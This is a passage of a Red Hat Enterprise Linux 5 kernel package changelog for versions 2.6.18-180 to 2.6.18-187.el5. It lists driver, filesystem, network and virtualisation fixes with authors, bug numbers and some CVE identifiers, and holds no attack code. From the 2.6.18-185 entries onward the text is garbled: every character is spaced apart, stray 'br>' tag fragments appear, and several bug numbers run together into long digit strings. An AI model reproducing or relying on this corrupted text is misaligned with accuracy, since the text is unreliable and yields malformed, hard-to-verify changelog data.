on AMD family 0x11 procs (Bhavna Sarathy) [555180]\n- [misc] ptrace: PTRACE_KILL hangs in 100% cpu loop (Vitaly Mayatskikh) [544138]\n- [scsi] megaraid: fix 32-bit apps on 64-bit kernel (Tomas Henzl) [518243]\n- [misc] fix APIC and TSC reads for guests (Prarit Bhargava) [562006]\n- [mm] fix sys_move_pages infoleak (Eugene Teo) [562590] {CVE-2010-0415}\n- [fs] aio: fix .5% OLTP perf regression from eventfd (Jeff Moyer) [548565]\n- [net] sky2: fix initial link state errors (Andy Gospodarek) [559329]\n- [x86_64] wire up compat sched_rr_get_interval (Danny Feng) [557092]\n- [net] netfilter: enforce CAP_NET_ADMIN in ebtables (Danny Feng) [555243] {CVE-2010-0007}\n- [misc] fix kernel info leak with print-fatal-signals=1 (Danny Feng) [554584] {CVE-2010-0003}\n- [fs] gfs2: dont withdraw on partial rindex entries (Benjamin Marzinski) [553447]\n- [net] ipv6: fix OOPS in ip6_dst_lookup_tail (Thomas Graf) [552354]\n- [misc] khungtaskd: set PF_NOFREEZE flag to fix suspend (Amerigo Wang) [550014]\n- [block] loop: fix aops check for GFS (Josef Bacik) [549397]\n[2.6.18-187.el5]\n- [misc] EDAC driver fix for non-MMCONFIG systems (Bhavna Sarathy) [550123]\n- [misc] audit: fix breakage and leaks in audit_tree.c (Alexander Viro) [549750]\n- [mm] prevent hangs during memory reclaim on large systems (Larry Woodman) [546428]\n- [usb] support more Huawei modems (Pete Zaitcev) [517454]\n- [x86] fix AMD M-C boot inside xen on pre-5.5 hypervisor (Paolo Bonzini) [560013]\n- [kvm] pvclock on i386 suffers from double registering (Glauber Costa) [557095]\n- [md] fix kernel panic releasing bio after recovery failed (Takahiro Yasui) [555171]\n- [md] fix deadlock at suspending mirror device (Takahiro Yasui) [555120]\n- [pci] VF cant be enabled in dom0 (Don Dutile) [547980]\n- [acpi] fix NULL pointer panic in acpi_run_os (Prarit Bhargava) [547733]\n- [kvm] kvmclock wont restore properly after resume (Glauber Costa) [539521]\n- [x86_64] export additional features in cpuinfo for xen (Prarit Bhargava) [517928]\n- [fs] proc: make smaps readable even after setuid (Dave Anderson) [322881]\n- [net] iptables: fix routing of REJECT target packets (Jiri Olsa) [548079]\n- [net] niu: fix the driver to be functional with vlans (Jiri Pirko) [538649]\n- [mm] prevent performance hit for 32-bit apps on x86_64 (Larry Woodman) [544448]\n- [mm] mmap: dont ENOMEM when mapcount is temp exceeded (Danny Feng) [552648]\n- [fs] proc: make errno values consistent when race occurs (Danny Feng) [556545]\n- [net] igb: update driver to support End Point DCA (Stefan Assmann) [513712]\n- [scsi] qla2xxx: FCP2 update, dpc bug, fast mailbox read (Rob Evers) [550286]\n- [scsi] qla2xxx: fix timeout value for CT passthru cmds (Rob Evers) [552327]\n- [scsi] lpfc: update to version 8.2.0.63.p2 (Rob Evers) [557792]\n- [scsi] lpfc: update driver to version 8.2.0.63.1p FC/FCoE (Rob Evers) [555604]\n- [scsi] be2iscsi: upstream driver refresh for rhel5.5 (Mike Christie) [554545]\n- [pci] add ids for intel b43 graphics controller (John Villalovos) [523637]\n- [misc] support Nehalem-EX processors in Oprofile (John Villalovos) [521992]\n- [scsi] scsi_dh: make rdac hw handlers activate() async (Rob Evers) [537514]\n- [scsi] scsi_dh: change scsidh_activate interface to async (Rob Evers) [537514]\n- [alsa] support Creative X-Fi EMU20K1 and EMU20K2 chips (Jaroslav Kysela) [523786]\n- [net] tg3: update to version 3.106 for 57765 asic support (John Feeney) [545135]\n- [net] bonding: fix alb mode locking regression (Andy Gospodarek) [533496]\n- [scsi] stex: dont try to scan a nonexistent lun (David Milburn) [531488]\n- [scsi] bnx2i: additional fixes for rhel5.5 update (Mike Christie) [517378]\n- [misc] hpilo: fix build warning in ilo_isr (Tony Camuso) [515010]\n- [scsi] qla2xxx: add AER support (Rob Evers) [513927]\n- [x86] relocate initramfs so we can increase vmalloc space (Neil Horman) [499253]\n- [mm] memory mapped files not updating timestamps (Peter Staubach) [452129]\n[2.6.18-186.el5]\n- [net] emergency route cache flushing fixes (Thomas Graf) [545663] {CVE-2009-4272}\n- [fs] fasync: split 'fasync_helper()' into separate add/remove functions (Danny Feng) [548657] {CVE-2009-4141}\n- [scsi] qla2xxx: NPIV vport management pseudofiles are world writable (Tom Coughlan) [537318] {CVE-2009-3556}\n- [net] ipv6: fix ipv6_hop_jumbo remote system crash (Amerigo Wang) [548643] {CVE-2007-4567}\n- [net] e1000e: fix broken wol (Andy Gospodarek) [557974]\n- [net] r8169: add missing hunk from frame length filtering fix (Jarod Wilson) [552438]\n[2.6.18-185.el5]\n- [net] e1000e: fix rx length check errors (Amerigo Wang) [ 5 5 1 2 2 3 ] { C V E - 2 0 0 9 - 4 5 3 8 } b r > - [ n e t ] e 1 0 0 0 : f i x r x l e n g t h c h e c k e r r o r s ( N e i l H o r m a n ) [ 5 5 2 1 3 8 ] { C V E - 2 0 0 9 - 4 5 3 6 } b r > - [ n e t ] r 8 1 6 9 : i m p r o v e d f r a m e l e n g t h f i l t e r i n g ( N e i l H o r m a n ) [ 5 5 0 9 1 5 ] { C V E - 2 0 0 9 - 4 5 3 7 } b r > - k a b i : f i x d m a _ a s y n c _ r e g i s t e r s y m b o l m o v e ( J a r o d W i l s o n ) [ 5 2 6 3 4 2 ] b r > - [ k a b i ] a d d { n a p i , v l a n } _ g r o _ r e c e i v e a n d i n t e l d c a s y m b o l s ( J o n M a s t e r s ) [ 5 2 6 3 4 2 ] b r > - R e v e r t : a m d 6 4 _ e d a c : f i x a c c e s s t o p c i c o n f s p a c e t y p e 1 ( J a r o d W i l s o n ) [ 4 7 9 0 7 0 ] b r > b r > [ 2 . 6 . 1 8 - 1 8 4 . e l 5 ] b r > - [ s c s i ] l p f c : U p d a t e l p f c t o v e r s i o n 8 . 2 . 0 . 6 3 d r i v e r r e l e a s e ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x s i n g l e S C S I b u f f e r n o t h a n d l e d o n S L I 4 ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x D e a d F C F n o t t r i g g e r i n g d i s c o v e r y o t h e r s ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x v p o r t - > f c _ f l a g s e t o u t s i d e o f l o c k f a i l ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x p r o c e s s i n g o f f a i l e d r e a d f c f r e c o r d ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x f c h e a d e r s e q _ c o u n t c h e c k s ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : U p d a t e t o v e r s i o n 8 . 2 . 0 . 6 2 d r i v e r r e l e a s e ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x h b q b u f f o n l y f o r s l i 4 ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x h b q b u f f a d d s t o r e c e i v e q u e u e ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x m u l t i - f r a m e s e q u e n c e r e s p o n s e f r a m e s ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x a d a p t e r r e s e t a n d o f f / o n l i n e s t r e s s t e s t ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : U p d a t e t o v e r s i o n 8 . 2 . 0 . 6 1 d r i v e r r e l e a s e ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x v p o r t r e g i s t e r V P I a f t e r d e v l o s s t i m e o u t ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x c r a s h d u r i n g u n l o a d a n d s l i 4 a b o r t c m d ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : B l o c k e d a l l S C S I I / O r e q u e s t s f r o m m i d l a y e r ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : M a d e T i g e r S h a r k s e t u p a n d u s e s i n g l e F C P E Q ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : U p d a t e t o 8 . 2 . 0 . 6 0 d r i v e r r e l e a s e ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ s c s i ] l p f c : F i x v p o r t n o t l o g g i n g o u t w h e n b e i n g d e l e t e d ( R o b E v e r s ) [ 5 4 9 7 6 3 ] b r > - [ n e t ] f i x u p p r o b l e m s w i t h v l a n s a n d b o n d i n g ( A n d y G o s p o d a r e k ) [ 5 2 6 9 7 6 ] b r > - [ n e t ] i x g b e : u p s t r e a m u p d a t e t o i n c l u d e 8 2 5 9 9 - K R s u p p o r t ( A n d y G o s p o d a r e k ) [ 5 1 3 7 0 7 ] b r > - [ n e t ] e n i c : u p d a t e t o u p s t r e a m v e r s i o n 1 . 1 . 0 . 2 4 1 a ( A n d y G o s p o d a r e k ) [ 5 5 0 1 4 8 ] b r > - [ n e t ] b e 2 n e t : m u l t i p l e b u g f i x e s ( I v a n V e c e r a ) [ 5 4 9 4 6 0 ] b r > - [ n e t ] v i r t i o _ n e t : f i x t x w a k e u p r a c e c o n d i t i o n ( H e r b e r t X u ) [ 5 2 4 6 5 1 ] b r > - [ n e t ] a d d s e n d / r e c e i v e t r a c e p o i n t s ( N e i l H o r m a n ) [ 4 7 5 4 5 7 ] b r > - [ i s c s i ] f i x i n s t a l l p a n i c w / x e n i S C S I b o o t d e v i c e ( M i r o s l a v R e z a n i n a ) [ 5 1 2 9 9 1 ] b r > - R e v e r t : [ m m ] S R A T a n d N U M A f i x e s f o r s p a n a n d / o r i s d i s c ( L a r r y W o o d m a n ) [ 4 7 4 0 9 7 ] b r > - [ m i s c ] o p r o f i l e s u p p o r t f o r n e h a l m e e p p r o c e s s o r s ( J o h n V i l l a l o v o s ) [ 4 9 8 6 2 4 ] b r > - [ s c s i ] f i x d u p l i c a t e l i b i s c s i s y m b o l a n d k a b i w a r n i n g s ( J a r o d W i l s o n ) [ 5 1 5 2 8 4 ] b r > - [ e d a c ] a m d 6 4 _ e d a c : f i x a c c e s s t o p c i c o n f s p a c e t y p e 1 ( B h a v n a S a r a t h y ) [ 4 7 9 0 7 0 ] b r > - [ m i s c ] d o n o t e v a l u a t e W A R N _ O N c o n d i t i o n t w i c e ( H e n d r i k B r u e c k n e r ) [ 5 4 8 6 5 3 ] b r > - [ x e n ] f i x c p u f r e q u e n c y s c a l i n g o n I n t e l p r o c s ( C h r i s t o p h e r L a l a n c e t t e ) [ 5 5 3 3 2 4 ] b r > - [ x e n ] p a s s t h r o u g h M S I - X m a s k b i t a c c e l e r a t i o n V 3 ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - [ x e n ] c h a n g e i n t e r f a c e o f h v m _ m m i o _ a c c e s s V 3 ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - [ x e n ] f i x m s i x t a b l e f i x m a p a l l o c a t i o n V 3 ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > b r > [ 2 . 6 . 1 8 - 1 8 3 . e l 5 ] b r > - [ k a b i ] a d d s c s i _ d m a _ { , u n } m a p ( J o n M a s t e r s ) [ 5 3 3 4 8 9 ] b r > - [ k a b i ] a d d s c s i _ n l _ { s e n d _ v e n d o r _ m s g , { a d d , r e m o v e } _ d r i v e r } ( J o n M a s t e r s ) [ 5 1 5 8 1 2 ] b r > - [ k a b i ] a d d d o _ s e t t i m e o f d a y a n d _ _ u s e r _ w a l k _ f d ( J o n M a s t e r s ) [ 4 8 6 2 0 5 ] b r > - [ k a b i ] a d d p c i _ d o m a i n _ n r ( J o n M a s t e r s ) [ 4 5 0 1 2 1 ] b r > - [ s o u n d ] a l s a h d a d r i v e r u p d a t e f o r r h e l 5 . 5 ( J a r o s l a v K y s e l a ) [ 5 2 5 3 9 0 ] b r > - R e v e r t : [ p c i ] a v o i d d i s a b l i n g a c p i t o u s e n o n - c o r e P C I ( M a u r o C a r v a l h o C h e h a b ) [ 5 0 4 3 3 0 5 4 7 8 9 8 ] b r > - [ n e t ] w i r e l e s s : f i x b u i l d w h e n u s i n g O = o b j d i r ( J o h n L i n v i l l e ) [ 5 4 6 7 1 2 ] b r > - [ p c i ] r e m o v e m s i - x v e c t o r a l l o c a t i o n l i m i t a t i o n ( S t e f a n A s s m a n n ) [ 5 3 1 2 6 6 ] b r > - [ n e t ] v x g e : a v o i d n e t p o l l - > N A P I r a c e ( M i c h a l S c h m i d t ) [ 4 5 3 6 8 3 ] b r > - [ s c s i ] u p d a t e f c o e f o r r h e l 5 . 5 ( M i k e C h r i s t i e ) [ 5 2 6 2 5 9 ] b r > - [ n e t ] u p d a t e t g 3 d r i v e r t o v e r s i o n 3 . 1 0 0 ( J o h n F e e n e y ) [ 5 1 5 3 1 2 ] b r > - [ b l o c k ] f i x r c u a c c e s s e s i n p a r t i t i o n s t a t i s t i c s c o d e ( J e r o m e M a r c h a n d ) [ 4 9 3 5 1 7 ] b r > - [ p c i ] e n a b l e a c s p 2 p u p s t r e a m f o r w a r d i n g ( C h r i s W r i g h t ) [ 5 1 8 3 0 5 ] b r > - [ n e t ] e 1 0 0 0 e : s u p p o r t f o r 8 2 5 6 7 V - 3 a n d M T U f i x e s ( A n d y G o s p o d a r e k ) [ 5 1 3 7 0 6 ] b r > - [ p c i ] a e r h e s t d i s a b l e s u p p o r t ( P r a r i t B h a r g a v a ) [ 5 4 7 7 6 2 ] b r > - [ p c i ] a e r h e s t f i r m w a r e f i r s t s u p p o r t ( P r a r i t B h a r g a v a ) [ 5 4 7 7 6 2 ] b r > - [ b l o c k ] i o s c h e d : f i x b a t c h i n g f a i r n e s s ( J e f f M o y e r ) [ 4 6 2 4 7 2 ] b r > - [ b l o c k ] i o s c h e d : r e s e t b a t c h f o r o r d e r e d r e q u e s t s ( J e f f M o y e r ) [ 4 6 2 4 7 2 ] b r > - [ n e t ] b o n d i n g : a l l o w a r p _ i p _ t a r g e t s o n s e p a r a t e v l a n f r o m b o n d d e v i c e ( A n d y G o s p o d a r e k ) [ 5 2 6 9 7 6 ] b r > - [ f i r e w i r e ] o h c i : h a n d l e r e c e i v e p a c k e t s w i t h z e r o d a t a ( J a y F e n l a s o n ) [ 5 4 7 2 4 2 ] { C V E - 2 0 0 9 - 4 1 3 8 } b r > - [ d r m ] i n t e l : a d d I R O N L A K E s u p p o r t t o A G P / D R M d r i v e r s ( D a v e A i r l i e ) [ 5 4 7 9 0 8 ] b r > - [ x e n ] m a s k A M D s N o d e I D M S R ( A n d r e w J o n e s ) [ 5 4 7 5 1 8 ] b r > - R e v e r t : [ x e n ] f i x m s i - x t a b l e f i x m a p a l l o c a t i o n ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - R e v e r t : [ x e n ] c h a n g e i n t e r f a c e o f h v m _ m m i o _ a c c e s s ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > - R e v e r t : [ x e n ] p a s s t h r o u g h m s i - x m a s k b i t a c c e l e r a t i o n ( D o n D u g g e r ) [ 5 3 7 7 3 4 ] b r > b r > [ 2 . 6 . 1 8 - 1 8 2 . e l 5 ] b r > - [ x 8 6 _ 6 4 ] d i s a b l e v s y s c a l l i n k v m g u e s t s ( G l a u b e r C o s t a ) [ 5 4 2 6 1 2 ] b r > - [ f s ] e x t 3 : r e p l a c e l o c k _ s u p e r w i t h e x p l i c i t r e s i z e l o c k ( E r i c S a n d e e n ) [ 5 2 5 1 0 0 ] b r > - [ n e t ] b o n d i n g : a d d d e b u g m o d u l e o p t i o n ( J i r i P i r k o ) [ 5 4 6 6 2 4 ] b r > - [ f s ] r e s p e c t f l a g i n d o _ c o r e d u m p ( D a n n y F e n g ) [ 5 4 4 1 8 9 ] { C V E - 2 0 0 9 - 4 0 3 6 } b r > - [ m d ] f i x a r a c e i n d m - r a i d 1 ( M i k u l a s P a t o c k a ) [ 5 0 2 9 2 7 ] b r > - [ m i s c ] t i m e r : a d d t r a c e p o i n t s ( J a s o n B a r o n ) [ 5 3 4 1 7 8 ] b r > - [ n e t ] i p v 4 : f i x p o s s i b l e i n v a l i d m e m o r y a c c e s s ( P r a r i t B h a r g a v a ) [ 5 4 1 2 1 3 ] b r > - [ x 8 6 ] s u p p o r t A M D L 3 c a c h e i n d e x d i s a b l e ( B h a v n a S a r a t h y ) [ 5 1 7 5 8 6 ] b r > - [ s c s i ] a d d e m c c l a r i i o n s u p p o r t t o s c s i _ d h m o d u l e s ( M i k e C h r i s t i e ) [ 4 3 7 1 0 7 ] b r > - [ i n f i n i b a n d ] f i x i s e r s g a l i g m e n t h a n d l i n g ( M i k e C h r i s t i e ) [ 5 4 0 6 8 6 ] b r > - [ s c s i ] q l a 2 x x x : C T p a s s t h r o u g h a n d l i n k d a t a r a t e f i x e s ( M a r c u s B a r r o w ) [ 5 4 3 0 5 7 ] b r > - [ s c s i ] q l a 2 x x x : u p d a t e t o 8 . 0 3 . 0 1 . 0 4 . 0 5 . 0 5 - k ( M a r c u s B a r r o w ) [ 5 4 2 8 3 4 ] b r > - [ n e t ] s 2 i o : u p d a t e d r i v e r t o c u r r e n t u p s t r e a m v e r s i o n ( M i c h a l S c h m i d t ) [ 5 1 3 9 4 2 ] b r > - [ i a 6 4 ] e x p o r t c p u _ c o r e _ m a p ( l i k e i 3 8 6 a n d x 8 6 _ 6 4 ) ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ n e t ] s f c : a d d i t i o n a l f i x e s f o r r h e l 5 . 5 ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ r e d h a t ] c o n f i g s : e n a b l e b u i l d i n g o f t h e s f c d r i v e r ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ n e t ] s f c : a d d t h e s f c ( S o l a r f l a r e ) d r i v e r ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ n e t ] v x g e : d r i v e r u p d a t e t o 2 . 0 . 6 ( M i c h a l S c h m i d t ) [ 4 5 3 6 8 3 ] b r > - [ s c s i ] i b m v s c s i : u p s t r e a m m u l t i p a t h e n h a n c e m e n t s f o r 5 . 5 ( K e v i n M o n r o e ) [ 5 1 2 2 0 3 ] b r > b r > [ 2 . 6 . 1 8 - 1 8 1 . e l 5 ] b r > - [ v f s ] D I O w r i t e r e t u r n s - E I O o n t r y _ t o _ r e l e a s e _ p a g e f a i l ( J e f f M o y e r ) [ 4 6 1 1 0 0 ] b r > - [ w i r e l e s s ] e n a b l e u s e o f i n t e r n a l r e g u l a t o r y d a t a b a s e ( J o h n L i n v i l l e ) [ 5 4 6 7 1 2 ] b r > - [ w i r e l e s s ] a d d w i r e l e s s r e g u l a t o r y r u l e s d a t a b a s e ( J o h n L i n v i l l e ) [ 5 4 6 7 1 2 ] b r > - [ w i r e l e s s ] u s e i n t e r n a l r e g u l a t o r y d a t a b a s e i n f r a s t r u c t u r e ( J o h n L i n v i l l e ) [ 5 4 6 7 1 2 ] b r > - [ w i r e l e s s ] u p d a t e o l d s t a t i c r e g u l a t o r y d o m a i n r u l e s ( J o h n L i n v i l l e ) [ 5 4 3 7 2 3 ] b r > - [ n e t ] w i r e l e s s : r e p o r t r e a s o n a b l e b i t r a t e f o r 8 0 2 . 1 1 n ( J o h n L i n v i l l e ) [ 5 4 6 2 8 1 ] b r > - [ n e t ] m a c 8 0 2 1 1 : r e p o r t c o r r e c t s i g n a l f o r n o n - d B m v a l u e s ( J o h n L i n v i l l e ) [ 5 4 5 8 9 9 ] b r > - [ n e t ] w i r e l e s s : k i l l s o m e w a r n i n g s p a m ( J o h n L i n v i l l e ) [ 5 4 5 1 2 1 ] b r > - [ n e t ] m a c 8 0 2 1 1 : a v o i d u n i n i t p t r d e r e f i n i e e e 8 0 2 1 1 ( J o h n L i n v i l l e ) [ 5 4 5 1 2 1 ] b r > - [ n e t ] w i r e l e s s : a v o i d d e a d l o c k w h e n e n a b l i n g r f k i l l ( J o h n L i n v i l l e ) [ 5 4 2 5 9 3 ] b r > - [ w i r e l e s s ] c o n f i g u r a t i o n c h a n g e s f o r u p d a t e s ( J o h n L i n v i l l e ) [ 4 5 6 9 4 3 4 7 4 3 2 8 5 1 4 6 6 1 5 1 6 8 5 9 ] b r > - [ n e t ] a t h 9 k : b a c k p o r t d r i v e r f r o m 2 . 6 . 3 2 ( J o h n L i n v i l l e ) [ 4 5 6 9 4 3 ] b r > - [ n e t ] w i r e l e s s : u p d a t e s o f m a c 8 0 2 1 1 e t c f r o m 2 . 6 . 3 2 ( J o h n L i n v i l l e ) [ 4 7 4 3 2 8 5 1 4 6 6 1 5 1 6 8 5 9 ] b r > - [ n e t ] w i r e l e s s s u p p o r t u p d a t e s f r o m 2 . 6 . 3 2 ( J o h n L i n v i l l e ) [ 4 5 6 9 4 3 4 7 4 3 2 8 5 1 4 6 6 1 5 1 6 8 5 9 ] b r > - [ n e t ] b n x 2 : u p d a t e t o v e r s i o n 2 . 0 . 2 ( J o h n F e e n e y ) [ 5 1 7 3 7 7 ] b r > - [ u s b ] s u p p o r t l e x a r e x p r e s s c a r d ( P e t e Z a i t c e v ) [ 5 1 1 3 7 4 ] b r > - [ n e t ] c n i c : u p d a t e d r i v e r f o r R H E L 5 . 5 ( S t a n i s l a w G r u s z k a ) [ 5 1 7 3 7 8 ] b r > - [ n e t ] b n x 2 x : u p d a t e t o 1 . 5 2 . 1 - 5 ( S t a n i s l a w G r u s z k a ) [ 5 1 5 7 1 6 5 2 2 6 0 0 ] b r > - [ n e t ] b n x 2 x : a d d m d i o s u p p o r t ( S t a n i s l a w G r u s z k a ) [ 5 1 5 7 1 6 5 2 2 6 0 0 ] b r > - [ n e t ] b n x 2 x : a d d f i r m w a r e v e r s i o n 5 . 2 . 7 . 0 ( S t a n i s l a w G r u s z k a ) [ 5 1 5 7 1 6 5 2 2 6 0 0 ] b r > - [ n e t ] b n x 2 x : u p d a t e t o 1 . 5 2 . 1 ( S t a n i s l a w G r u s z k a ) [ 5 1 5 7 1 6 5 2 2 6 0 0 ] b r > - [ f s ] m a k e N R _ O P E N t u n a b l e ( E r i c S a n d e e n ) [ 5 0 7 1 5 9 ] b r > - [ n e t ] m d i o : a d d m d i o m o d u l e f r o m u p s t r e a m ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ n e t ] e t h t o o l : a d d m o r e d e f i n e s f o r m d i o t o u s e ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ p c i ] a d d a n d e x p o r t p c i _ c l e a r _ m a s t e r ( M i c h a l S c h m i d t ) [ 4 4 8 8 5 6 ] b r > - [ m m ] S R A T a n d N U M A f i x e s f o r s p a n a n d / o r i s d i s c o n t i g m e m ( L a r r y W o o d m a n ) [ 4 7 4 0 9 7 ] b r > - [ f s ] e v e n t f d : r e m o v e f p u t c a l l f r o m p o s s i b l e I R Q c o n t e x t ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] e v e n t f d : k a i o i n t e g r a t i o n f i x ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] e v e n t f d : s a n i t i z e a n o n _ i n o d e _ g e t f d ( ) ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] e v e n t f d : c l e a n c o m p i l e w h e n C O N F I G _ E V E N T F D = n ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ s 3 9 0 ] w i r e u p s i g n a l d , t i m e r f d a n d e v e n t f d s y s c a l l s ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] e v e n t f d : u s e w a i t q u e u e l o c k ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ p p c ] w i r e u p e v e n t f d s y s c a l l s ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ i a 6 4 ] w i r e u p { s i g n a l , t i m e r , e v e n t } f d s y s c a l l s ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] a i o : K A I O e v e n t f d s u p p o r t e x a m p l e ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] e v e n t f d : w i r e u p x 8 6 a r c h e s ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ f s ] a d d e v e n t f d c o r e ( J e f f M o y e r ) [ 4 9 3 1 0 1 ] b r > - [ n e t ] r 8 1 6 9 : u p d a t e t o l a t e s t u p s t r e a m f o r r h e l 5 . 5 ( I v a n V e c e r a ) [ 5 4 0 5 8 2 ] b r > - [ n e t ] b e n e t : u p d a t e d r i v e r t o l a t e s t u p s t r e a m f o r r h e l 5 . 5 ( I v a n V e c e r a ) [ 5 1 5 2 6 9 ] b r > - [ n e t ] e 1 0 0 0 e : u p d a t e a n d f i x W O L i s s u e s ( A n d y G o s p o d a r e k ) [ 5 1 3 7 0 6 5 1 3 9 3 0 5 1 7 5 9 3 5 3 1 0 8 6 ] b r > - [ n e t ] e 1 0 0 0 : u p d a t e t o l a t e s t u p s t r e a m f o r r h e l 5 . 5 ( D e a n N e l s o n ) [ 5 1 5 5 2 4 ] b r > - [ n e t ] m l x 4 : u p d a t e t o r e c e n t v e r s i o n w i t h S R I O V s u p p o r t ( D o u g L e d f o r d ) [ 5 0 3 1 1 3 5 1 2 1 6 2 5 2 0 6 7 4 5 2 7 4 9 9 5 2 9 3 9 6 5 3 4 1 5 8 ] b r > - [ m d ] r a i d : d e a l w i t h s o f t l o c k u p s d u r i n g r e s y n c ( D o u g L e d f o r d ) [ 5 0 1 0 7 5 ] b r > - [ x 8 6 ] a m d : a d d n o d e I D M S R s u p p o r t ( B h a v n a S a r a t h y ) [ 5 3 0 1 8 1 ] b r > - [ n e t ] i p v 4 : f i x a n u n e x p e c t e d l y f r e e d s k b i n t c p ( A m e r i g o W a n g ) [ 5 4 6 4 0 2 ] b r > b r > [ 2 . 6 . 1 8 - 1 8 0 . e l 5 ] b r > - [ f s ] e x t 4 : f i x i n s u f f i c i e n t c h e c k s i n E X T 4 _ I O C _ M O V E _ E X T ( E r i c S a n d e e n ) [ 5 4 6 1 0 5 ] { C V E - 2 0 0 9 - 4 1 3 1 } b r > - [ f s ] f i x p o s s i b l e i n o d e c o r r u p t i o n o n u n l o c k ( E r i c S a n d e e n ) [ 5 4 5 6 1 2 ] b r > - [ f s ] x f s : f i x f a l l o c a t e e r r o r r e t u r n s i g n ( E r i c S a n d e e n ) [ 5 4 4 3 4 9 ] b r > - [ n e t ] b n x 2 : f i x f r a g s i n d e x ( F l a v i o L e i t n e r ) [ 5 4 6 3 2 6 ] b r > - [ p c i ] i m p l e m e n t p u b l i c p c i _ i o r e m a p _ b a r f u n c t i o n ( P r a r i t B h a r g a v a ) [ 5 4 6 2 4 4 ] b r > - [ t r a c e ] a d d c o r e d u m p t r a c e p o i n t ( M a s a m i H i r a m a t s u ) [ 5 1 7 1 1 5 ] b r > - [ t r a c e ] a d d s i g n a l t r a c e p o i n t s ( M a s a m i H i r a m a t s u ) [ 5 1 7 1 2 1 ] b r > - [ t r a c e ] a d d i t i m e r t r a c e p o i n t s ( J a s o n B a r o n ) [ 5 3 4 1 7 8 ] b r > - [ g f s 2 ] m a k e O _ A P P E N D b e h a v e a s e x p e c t e d ( S t e v e n W h i t e h o u s e ) [ 5 4 4 3 4 2 ] b r > - [ g f s 2 ] f i x r e n a m e l o c k i n g i s s u e ( S t e v e n W h i t e h o u s e ) [ 5 3 8 4 8 4 ] b r > - [ u s b ] a d d q u i r k f o r i s o o n a m d s b 8 0 0 ( P e t e Z a i t c e v ) [ 5 3 7 4 3 3 ] b r > - [ m m ] a d d k e r n e l p a g e f a u l t t r a c e p o i n t f o r x 8 6 & x 8 6 _ 6 4 ( L a r r y W o o d m a n ) [ 5 1 7 1 3 3 ] b r > - [ i a 6 4 ] d m a _ g e t _ r e q u i r e d _ m a s k a l t i x w o r k a r o u n d ( G e o r g e B e s h e r s ) [ 5 1 7 1 9 2 ] b r > - [ m i s c ] s y s c t l : r e q u i r e C A P _ S Y S _ R A W I O t o s e t m m a p _ m i n _ a d d r ( A m e r i g o W a n g ) [ 5 3 4 0 1 8 ] b r > - [ p c i ] i n t e l - i o m m u : n o p a g e t a b l e v a l i d a t e i n p a s s t h r u m o d e ( D o n D u t i l e ) [ 5 1 8 1 0 3 ] b r > - [ p c i ] i n t e l - i o m m u : s e t d m a r _ d i s a b l e d w h e n D M A R a t z e r o ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ p c i ] d m a r : r h s a e n t r y d e c o d e ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ p c i ] i n t e l - i o m m u : a d d h o t ( u n ) p l u g s u p p o r t ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ p c i ] i n t e - i o m m u : a l l o c _ c o h e r e n t o b e y c o h e r e n t _ d m a _ m a s k ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ p c i ] d m a r : c h e c k f o r D M A R a t z e r o B I O S e r r o r e a r l i e r ( D o n D u t i l e ) [ 5 1 6 8 1 1 5 1 8 1 0 3 ] b r > - [ p c i ] i n t e l - i o m m u : f i x f o r i s o c h d m a r w / n o t l b s p a c e ( D o n D u t i l e ) [ 5 1 6 8 1 1 